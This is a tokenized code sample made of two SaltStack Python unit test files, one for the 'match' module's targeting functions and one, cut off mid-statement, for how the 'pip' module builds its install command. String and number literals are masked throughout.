<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import TestCase , skipIf <EOL> from salttesting . mock import ( <EOL> MagicMock , <EOL> patch , <EOL> NO_MOCK , <EOL> NO_MOCK_REASON <EOL> ) <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . modules import match <EOL> import salt . ext . six . moves . builtins as __builtin__ <EOL> match . __grains__ = { } <EOL> match . __salt__ = { } <EOL> match . __opts__ = { } <EOL> match . __pillar__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class MatchTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_compound ( self , mock_matcher ) : <EOL> '''<STR_LIT>''' <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> mock_matcher . side_effect = MagicMock ( ) <EOL> with patch . object ( mock_matcher , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . assertTrue ( match . compound ( '<STR_LIT>' ) ) <EOL> mock_matcher . side_effect = MagicMock ( return_value = '<STR_LIT:B>' ) <EOL> self . assertFalse ( match . compound ( '<STR_LIT>' ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_ipcidr ( self , mock_matcher ) : <EOL> '''<STR_LIT>''' <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> mock_matcher . side_effect = MagicMock ( ) <EOL> with patch . object ( mock_matcher , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . assertTrue ( match . ipcidr ( '<STR_LIT>' ) ) <EOL> mock_matcher . side_effect = MagicMock ( return_value = '<STR_LIT:B>' ) <EOL> self . assertFalse ( match . ipcidr ( '<STR_LIT>' ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_pillar ( self , mock_matcher ) : <EOL> '''<STR_LIT>''' <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> mock_matcher . side_effect = MagicMock ( ) <EOL> with patch . object ( mock_matcher , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . assertTrue ( match . pillar ( '<STR_LIT>' ) ) <EOL> mock_matcher . side_effect = MagicMock ( return_value = '<STR_LIT:B>' ) <EOL> self . assertFalse ( match . pillar ( '<STR_LIT>' ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_data ( self , mock_matcher ) : <EOL> '''<STR_LIT>''' <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> mock_matcher . side_effect = MagicMock ( ) <EOL> with patch . object ( mock_matcher , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . assertTrue ( match . data ( '<STR_LIT>' ) ) <EOL> mock_matcher . side_effect = MagicMock ( return_value = '<STR_LIT:B>' ) <EOL> self . assertFalse ( match . data ( '<STR_LIT>' ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_grain_pcre ( self , mock_matcher ) : <EOL> '''<STR_LIT>''' <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> mock_matcher . side_effect = MagicMock ( ) <EOL> with patch . object ( mock_matcher , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . assertTrue ( match . grain_pcre ( '<STR_LIT>' ) ) <EOL> mock_matcher . side_effect = MagicMock ( return_value = '<STR_LIT:B>' ) <EOL> self . assertFalse ( match . grain_pcre ( '<STR_LIT>' ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_grain ( self , mock_matcher ) : <EOL> '''<STR_LIT>''' <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> mock_matcher . side_effect = MagicMock ( ) <EOL> with patch . object ( mock_matcher , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . assertTrue ( match . grain ( '<STR_LIT>' ) ) <EOL> mock_matcher . side_effect = MagicMock ( return_value = '<STR_LIT:B>' ) <EOL> self . assertFalse ( match . grain ( '<STR_LIT>' ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_list_ ( self , mock_matcher ) : <EOL> '''<STR_LIT>''' <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> mock_matcher . side_effect = MagicMock ( ) <EOL> with patch . object ( mock_matcher , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . assertTrue ( match . list_ ( '<STR_LIT>' ) ) <EOL> mock_matcher . side_effect = MagicMock ( return_value = '<STR_LIT:B>' ) <EOL> self . assertFalse ( match . list_ ( '<STR_LIT>' ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_pcre ( self , mock_matcher ) : <EOL> '''<STR_LIT>''' <EOL> mock_matcher . side_effect = MagicMock ( ) <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> with patch . object ( mock_matcher , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . assertTrue ( match . pcre ( '<STR_LIT>' ) ) <EOL> mock_matcher . side_effect = MagicMock ( return_value = '<STR_LIT:B>' ) <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> self . assertFalse ( match . pcre ( '<STR_LIT>' ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_glob ( self , mock_matcher ) : <EOL> '''<STR_LIT>''' <EOL> with patch . dict ( match . __grains__ , { '<STR_LIT:id>' : <NUM_LIT> } ) : <EOL> mock_matcher . side_effect = MagicMock ( ) <EOL> with patch . object ( mock_matcher , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . assertTrue ( match . glob ( '<STR_LIT>' ) ) <EOL> mock_matcher . side_effect = MagicMock ( return_value = '<STR_LIT:B>' ) <EOL> self . assertFalse ( match . glob ( '<STR_LIT>' ) ) <EOL> def test_filter_by ( self ) : <EOL> '''<STR_LIT>''' <EOL> with patch . object ( __builtin__ , '<STR_LIT>' , MagicMock ( ) ) : <EOL> self . assertEqual ( match . filter_by ( { '<STR_LIT:key>' : '<STR_LIT:value>' } , <EOL> minion_id = <NUM_LIT> ) , '<STR_LIT:value>' ) <EOL> self . assertEqual ( match . filter_by ( { '<STR_LIT:key>' : '<STR_LIT:value>' } ) , '<STR_LIT:value>' ) <EOL> self . assertEqual ( match . filter_by ( { } ) , None ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( MatchTestCase , needs_daemon = False ) </s>
<s> from __future__ import absolute_import <EOL> import os <EOL> from salttesting import skipIf , TestCase <EOL> from salttesting . helpers import ensure_in_syspath <EOL> from salttesting . mock import NO_MOCK , NO_MOCK_REASON , MagicMock , patch <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . modules import pip <EOL> from salt . exceptions import CommandExecutionError <EOL> pip . __salt__ = { '<STR_LIT>' : lambda _ : '<STR_LIT>' } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class PipTestCase ( TestCase ) : <EOL> def test_fix4361 ( self ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( requirements = '<STR_LIT>' ) <EOL> expected_cmd = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> mock . assert_called_once_with ( <EOL> expected_cmd , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_editable_without_egg_fails ( self ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> CommandExecutionError , <EOL> pip . install , <EOL> editable = '<STR_LIT>' <EOL> ) <EOL> def test_install_multiple_editable ( self ) : <EOL> editables = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> for item in editables : <EOL> expected . extend ( [ '<STR_LIT>' , item ] ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( editable = editables ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( editable = '<STR_LIT:U+002C>' . join ( editables ) ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_multiple_pkgs_and_editables ( self ) : <EOL> pkgs = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> editables = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' ] + pkgs <EOL> for item in editables : <EOL> expected . extend ( [ '<STR_LIT>' , item ] ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkgs = pkgs , editable = editables ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkgs = '<STR_LIT:U+002C>' . join ( pkgs ) , editable = '<STR_LIT:U+002C>' . join ( editables ) ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkgs = pkgs [ <NUM_LIT:0> ] , editable = editables [ <NUM_LIT:0> ] ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , pkgs [ <NUM_LIT:0> ] , '<STR_LIT>' , editables [ <NUM_LIT:0> ] ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_issue5940_install_multiple_pip_mirrors ( self ) : <EOL> mirrors = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for item in mirrors : <EOL> expected . extend ( [ '<STR_LIT>' , item ] ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( mirrors = mirrors ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( mirrors = '<STR_LIT:U+002C>' . join ( mirrors ) ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( mirrors = mirrors [ <NUM_LIT:0> ] ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , mirrors [ <NUM_LIT:0> ] ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_with_multiple_find_links ( self ) : <EOL> find_links = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> pkg = '<STR_LIT>' <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> for item in find_links : <EOL> expected . extend ( [ '<STR_LIT>' , item ] ) <EOL> expected . append ( pkg ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , find_links = find_links ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , find_links = '<STR_LIT:U+002C>' . join ( find_links ) ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , find_links = find_links [ <NUM_LIT:0> ] ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , find_links [ <NUM_LIT:0> ] , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> CommandExecutionError , <EOL> pip . install , <EOL> '<STR_LIT>' + pkg + '<STR_LIT>' , <EOL> find_links = '<STR_LIT>' <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , find_links = find_links ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_no_index_with_index_url_or_extra_index_url_raises ( self ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> CommandExecutionError , <EOL> pip . install , no_index = True , index_url = '<STR_LIT>' <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> CommandExecutionError , <EOL> pip . install , no_index = True , extra_index_url = '<STR_LIT>' <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_install_failed_cached_requirements ( self , get_cached_requirements ) : <EOL> get_cached_requirements . return_value = False <EOL> ret = pip . install ( requirements = '<STR_LIT>' ) <EOL> self . assertEqual ( False , ret [ '<STR_LIT:result>' ] ) <EOL> self . assertIn ( '<STR_LIT>' , ret [ '<STR_LIT>' ] ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_install_cached_requirements_used ( self , get_cached_requirements ) : <EOL> get_cached_requirements . return_value = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( requirements = '<STR_LIT>' ) <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_install_venv ( self , mock_path ) : <EOL> mock_path . is_file . return_value = True <EOL> mock_path . isdir . return_value = True <EOL> pkg = '<STR_LIT>' <EOL> venv_path = '<STR_LIT>' <EOL> def join ( * args ) : <EOL> return '<STR_LIT:/>' . join ( args ) <EOL> mock_path . join = join <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , bin_env = venv_path ) <EOL> mock . assert_called_once_with ( <EOL> [ os . path . join ( venv_path , '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' , pkg ] , <EOL> env = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_install_log_argument_in_resulting_command ( self , mock_path ) : <EOL> pkg = '<STR_LIT>' <EOL> log_path = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , log = log_path ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , log_path , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_non_writeable_log ( self , mock_path ) : <EOL> pkg = '<STR_LIT>' <EOL> log_path = '<STR_LIT>' <EOL> mock_path . exists . side_effect = IOError ( '<STR_LIT>' ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> IOError , <EOL> pip . install , <EOL> pkg , <EOL> log = log_path <EOL> ) <EOL> def test_install_timeout_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> expected_prefix = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , timeout = <NUM_LIT:10> ) <EOL> mock . assert_called_once_with ( <EOL> expected_prefix + [ <NUM_LIT:10> , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , timeout = '<STR_LIT>' ) <EOL> mock . assert_called_once_with ( <EOL> expected_prefix + [ '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> ValueError , <EOL> pip . install , <EOL> pkg , <EOL> timeout = '<STR_LIT:a>' <EOL> ) <EOL> def test_install_index_url_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> index_url = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , index_url = index_url ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , index_url , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_extra_index_url_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> extra_index_url = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , extra_index_url = extra_index_url ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , extra_index_url , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_no_index_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , no_index = True ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_build_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> build = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , build = build ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , build , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_target_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> target = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , target = target ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , target , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_download_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> download = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , download = download ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , download , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_no_download_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , no_download = True ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_download_cache_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> download_cache = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , download_cache = '<STR_LIT>' ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , download_cache , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_source_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> source = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , source = source ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , source , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> def test_install_exists_action_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> for action in ( '<STR_LIT:s>' , '<STR_LIT:i>' , '<STR_LIT:w>' , '<STR_LIT:b>' ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( '<STR_LIT>' , exists_action = action ) <EOL> mock . assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , action , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> CommandExecutionError , <EOL> pip . install , <EOL> pkg , <EOL> exists_action = '<STR_LIT:d>' <EOL> ) <EOL> def test_install_install_options_argument_in_resulting_command ( self ) : <EOL> install_options = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> pkg = '<STR_LIT>' <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> for item in install_options : <EOL> expected . extend ( [ '<STR_LIT>' , item ] ) <EOL> expected . append ( pkg ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , install_options = install_options ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . install ( pkg , install_options = '<STR_LIT:U+002C>' . join ( install_options ) ) <EOL> mock . assert_called_once_with ( <EOL> expected , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : 